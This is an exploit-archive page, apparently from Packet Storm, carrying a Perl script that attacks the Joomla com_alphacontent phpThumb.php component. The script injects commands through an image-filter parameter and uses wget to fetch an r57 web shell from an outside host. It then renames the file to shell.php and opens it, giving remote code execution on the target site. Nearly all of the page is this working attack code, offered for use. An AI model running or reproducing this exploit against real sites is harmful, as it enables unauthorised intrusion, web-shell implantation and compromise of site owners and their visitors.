the original cloud security

Joomla Alphacontent phpThumb.php Shell Upload

Joomla Alphacontent phpThumb.php Shell Upload
Posted Dec 1, 2013
Authored by DevilScreaM

Joomla Alphacontent includes phpThumb.php which is known to suffer from a remote shell upload vulnerability.

tags | exploit, remote, shell, php
MD5 | 9cf726191c1181f2d4aa31b0fd4f2f83

Joomla Alphacontent phpThumb.php Shell Upload

Change Mirror Download
#Title : Joomla com_alphacontent Remote Code Execution

#Author : DevilScreaM

#Date : 1 Desember 2013

#Category : Web Applications

#Type : PHP

#Vendor : http://alphaplug.com/

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : Remote Code Execution


#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];

if($target eq '')
{
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl exploit.pl <target> \n";
exit(1);
}

if ($target !~ /http:\/\//)
{
$target = "http://$target";
}

#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(1.1);
print "[*] Testing exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
$website =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php??src=file.jpg&fltr

[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";

$request = $agent->request(HTTP::Request->new(GET=>$website));

if ($request->is_success)
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}

else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}

print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);

$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));

if ($creq->is_success)
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format... Please wait... \n";
sleep(1.1);
$mvwebsite =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php?

src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;

&phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));

$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));

if ($c2req->is_success)
{
print "[+] PHP Shell uploaded => $cwebsite :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;

if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}

}

else
{
print "[-] Error while moving shell from txt to PHP :( \n";
exit(1);
}

}

else
{
print "[-] Txt shell not uploaded. :( \n";
}


==============================================================

Shell Access

http://TARGET/components/com_alphacontent/assets/phpthumb/shell.php

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    6 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close